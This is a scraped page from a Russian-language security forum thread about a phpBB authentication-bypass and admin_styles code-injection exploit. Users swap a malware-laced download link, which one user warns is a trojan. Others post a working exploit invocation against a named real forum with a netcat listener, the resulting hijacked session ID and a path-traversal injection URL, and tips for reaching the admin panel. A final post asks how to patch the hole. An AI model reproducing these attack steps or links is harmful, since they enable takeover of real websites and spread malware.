Security Lab

phpBB User id Auth. Bypass and "admin_styles" Code Inject...




Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Страницы: Пред. 1 2 3 4 5 ... 8 След.
RSS
phpBB User id Auth. Bypass and "admin_styles" Code Inject...
 
Цитата
Гость пишет:
http://co2extracts.biz/anion.exe
exploit

РАБОТАЕТ НА УРКА, ДА ЕЩЕ И ГУИ ИНТЕРФЕЙС
 
Цитата
Гость пишет:
http://co2extracts.biz/anion.exe
exploit
Ага щаз:)  не запускайте! это троян.
создает с:\WINDOWS\system32\winhost.exe
и щемится на webnomey.net
причем пытается закрыть аутпост:)
 
Мальчики помогите, скажите каким компилятором,
скомпилировать этот эксплоит., уж извиняйте не могу разобраться какой каким собирать:)
 
Цитата
Black ice пишет:
 
Цитата
Гость Я пишет:
Блин нифига не работает, пишет
_ recuperation de lindentifiant de session a achouder
у меня пишет тоже самое что делать
что мне делать помогите плиз
 
Кто нибудь может разьяснить, что этот эксплоит впринципе делает ?
 
Почему все молчат? еще вопрос повился значит без шелла я не смогу воспользоваться этим эксплоитом,
посоветуйте мне где достать шелл
 
врубаю неткат на 7777 порт, пускаю эксплоит
>phpbbexp.exe http://www.ku.ru/phpBB2/ 192.168.*.* 7777
_ nom du cookie recuperer : phpbb2mysql
_ SESSION ID recuperщ ... 2b2cc3e024df7b56a45d74ed83aa780a
http://www.ku.ru/phpBB2/?sid=2b2cc3e024df7b56a45d74ed83aa780 a
_ recuperation du nom de la table sql ... phpbb_ OK
_ Injection de la fake templates ...OK
_ Fichier crщe
_ Code executщ
http://www.*.ru/phpBB2/admin/admin_styles.php?mode=addnew&in stall_to=../../../.
./../../../../../../../../../../../../../../../tmp&nigga=php info();&sid=2b2cc3e0
24df7b56a45d74ed83aa780a - Этого я так понял быть не должно...
у когонить получилось ???
 
Если у вас появилась эта строка , значит все получилось!

http://www.*.ru/phpBB2/admin/admin_styles.php?mode=addnew&in stall_to=../../../.
./../../../../../../../../../../../../../../../tmp&nigga=php info();&sid=2b2cc3e0

Перед вводом этой строки просто удалите свои кукисы , и сразу в админ панели!
 
если выскочили случайно из места администрирования , проделайте эксплоит заново . И перед вводом этого длинного пути ./../../ удаляйте свои булочки!
 
Дык вродеж эксплоит шелл дает.... В админку я и без него влезу...
 
recuperation du nom de la table sql ... cant find

вот это пишет...
 
гхы а шелл то оно дает !!!)))))) теперь опять кучу сайтов поимеют...
 
Объясните чо это все таки за ошибка?
recuperation du nom de la table sql ... cant find

и еще один глупый вопрос, какой порт указывать?
 
][лам, каким образом на шел входить ? Через телнет не пашет
 
][lam rasskaji nam lamIram kak ti shely polu4il [IMG]http://www.securitylab.ru/forum/smileys/smiley1.gif[/IMG]
 
Цитата
][лам пишет:
врубаю неткат на 7777 порт, пускаю эксплоит
что есть неткат ?
 
Цитата
Black ice пишет:
 [QUOTE]Black ice пишет:
 [QUOTE]Гость Я пишет:
Блин нифига не работает, пишет
_ recuperation de lindentifiant de session a achouder
ЛЮДИ ОБРАЩАЮСЬ К ВАМ ЕСТЬ ТУТ УМНЫЕ ЛЮДИ ПОКРАЙНЕЙ МЕРЕ УМНЕЕ МЕНЯ ЧТО МНЕ ДЕЛАТЬ ЕСЛИ У МЕНЯ ВЫСКАКИВАЕТ ТАКОЕ СООБЩЕНИЕ НА ВСЕХ САЙТАХ КОТОРЫЕ ЮЗАЛ?
 
2Black ice :
что есть неткат ?
lolz
 
Цитата
fr0st пишет:
2Black ice :
что есть неткат ?
lolz
сам лол гы
 
лучше скажите что и где поменять чтобы дыру закрыть
Страницы: Пред. 1 2 3 4 5 ... 8 След.
Читают тему